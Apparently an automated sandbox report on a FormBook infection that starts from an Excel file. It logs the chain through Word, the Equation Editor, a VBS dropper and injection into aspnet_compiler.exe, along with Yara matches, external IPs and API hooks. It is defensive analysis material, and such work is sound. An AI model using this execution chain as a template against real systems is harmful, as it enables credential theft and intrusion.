          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.64.88:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.18.213.20:443 -> 192.168.2.22:49173 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B830AA2.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Excel sheet contains many unusual embedded objects
          Source: QT2Q1292.xla.xlsxOLE: Microsoft Excel 2007+
          Source: ~DF7D9593F7751AD48D.TMP.0.drOLE: Microsoft Excel 2007+
          Source: 0DE30000.0.drOLE: Microsoft Excel 2007+
          Microsoft Office drops suspicious files
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bg7UYE.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\strmr.co.urlJump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042BDA3 NtClose,13_2_0042BDA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C07AC NtCreateMutant,LdrInitializeThunk,13_2_007C07AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BF9F0 NtClose,LdrInitializeThunk,13_2_007BF9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFAE8 NtQueryInformationProcess,LdrInitializeThunk,13_2_007BFAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFB68 NtFreeVirtualMemory,LdrInitializeThunk,13_2_007BFB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFDC0 NtQuerySystemInformation,LdrInitializeThunk,13_2_007BFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C0078 NtResumeThread,13_2_007C0078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C0060 NtQuerySection,13_2_007C0060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C0048 NtProtectVirtualMemory,13_2_007C0048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C10D0 NtOpenProcessToken,13_2_007C10D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C00C4 NtCreateFile,13_2_007C00C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C1148 NtOpenThread,13_2_007C1148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C010C NtOpenDirectoryObject,13_2_007C010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C01D4 NtSetValueKey,13_2_007C01D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BF8CC NtWaitForSingleObject,13_2_007BF8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BF938 NtWriteFile,13_2_007BF938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C1930 NtSetContextThread,13_2_007C1930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BF900 NtReadFile,13_2_007BF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFA50 NtEnumerateValueKey,13_2_007BFA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFA20 NtQueryInformationFile,13_2_007BFA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFAD0 NtAllocateVirtualMemory,13_2_007BFAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFAB8 NtQueryValueKey,13_2_007BFAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFB50 NtCreateKey,13_2_007BFB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFBE8 NtQueryVirtualMemory,13_2_007BFBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFBB8 NtQueryInformationToken,13_2_007BFBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFC60 NtMapViewOfSection,13_2_007BFC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFC48 NtSetInformationFile,13_2_007BFC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C0C40 NtGetContextThread,13_2_007C0C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFC30 NtOpenProcess,13_2_007BFC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFC90 NtUnmapViewOfSection,13_2_007BFC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFD5C NtEnumerateKey,13_2_007BFD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFD8C NtDelayExecution,13_2_007BFD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C1D80 NtSuspendThread,13_2_007C1D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFE24 NtWriteVirtualMemory,13_2_007BFE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFED0 NtAdjustPrivilegesToken,13_2_007BFED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFEA0 NtReadVirtualMemory,13_2_007BFEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFF34 NtQueueApcThread,13_2_007BFF34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFFFC NtCreateProcessEx,13_2_007BFFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007BFFB4 NtCreateSection,13_2_007BFFB4
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D705512_2_001D7055
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D28E012_2_001D28E0
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D210812_2_001D2108
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D672112_2_001D6721
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D20F712_2_001D20F7
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D0A7812_2_001D0A78
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 12_2_001D0A6A12_2_001D0A6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040100013_2_00401000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040F80313_2_0040F803
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004160B313_2_004160B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040126013_2_00401260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040FA2313_2_0040FA23
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402ADD13_2_00402ADD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402AE013_2_00402AE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040DAA313_2_0040DAA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040234013_2_00402340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042E33313_2_0042E333
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040233413_2_00402334
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402E7013_2_00402E70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040F7FA13_2_0040F7FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007E905A13_2_007E905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D304013_2_007D3040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007FD00513_2_007FD005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007CE0C613_2_007CE0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0084D06D13_2_0084D06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085D13F13_2_0085D13F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007CE2E913_2_007CE2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0087123813_2_00871238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D735313_2_007D7353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_008763BF13_2_008763BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D230513_2_007D2305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007F63DB13_2_007F63DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007CF3CF13_2_007CF3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0081A37B13_2_0081A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0080548513_2_00805485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085443E13_2_0085443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007E148913_2_007E1489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0080D47D13_2_0080D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_008735DA13_2_008735DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D351F13_2_007D351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_008505E313_2_008505E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007EC5F013_2_007EC5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0081654013_2_00816540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0087262213_2_00872622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0081A63413_2_0081A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007DE6C113_2_007DE6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D468013_2_007D4680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085579A13_2_0085579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_008057C313_2_008057C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0086771D13_2_0086771D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007DC7BC13_2_007DC7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007F286D13_2_007F286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007DC85C13_2_007DC85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0084F8C413_2_0084F8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0086F8EE13_2_0086F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0087098E13_2_0087098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_008649F513_2_008649F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007E69FE13_2_007E69FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085394B13_2_0085394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D29B213_2_007D29B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085595513_2_00855955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00883A8313_2_00883A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0087CBA413_2_0087CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00856BCB13_2_00856BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085DBDA13_2_0085DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007F7B0013_2_007F7B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007CFBD713_2_007CFBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00872C9C13_2_00872C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085AC5E13_2_0085AC5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007DCD5B13_2_007DCD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0086FDDD13_2_0086FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00800D3B13_2_00800D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007EEE4C13_2_007EEE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00802E2F13_2_00802E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007FDF7C13_2_007FDF7C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0086CFB113_2_0086CFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007E0F3F13_2_007E0F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00842FDC13_2_00842FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0085BF1413_2_0085BF14
          Source: QT2Q1292.xla.xlsxOLE indicator, VBA macros: true
          Source: ~DF7D9593F7751AD48D.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 007CE2A8 appears 60 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 007CDF5C appears 130 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0083F970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0081373B appears 253 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00813F92 appears 132 times
          Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B830AA2.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 12.2.temp_executable.exe.500000.1.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: 12.2.temp_executable.exe.26e31c8.5.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: 12.2.temp_executable.exe.26db524.4.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@9/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$QT2Q1292.xla.xlsxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMutant created: NULL
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8719.tmpJump to behavior
          Source: QT2Q1292.xla.xlsxOLE indicator, Workbook stream: true
          Source: 0DE30000.0.drOLE indicator, Workbook stream: true
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QT2Q1292.xla.xlsxReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
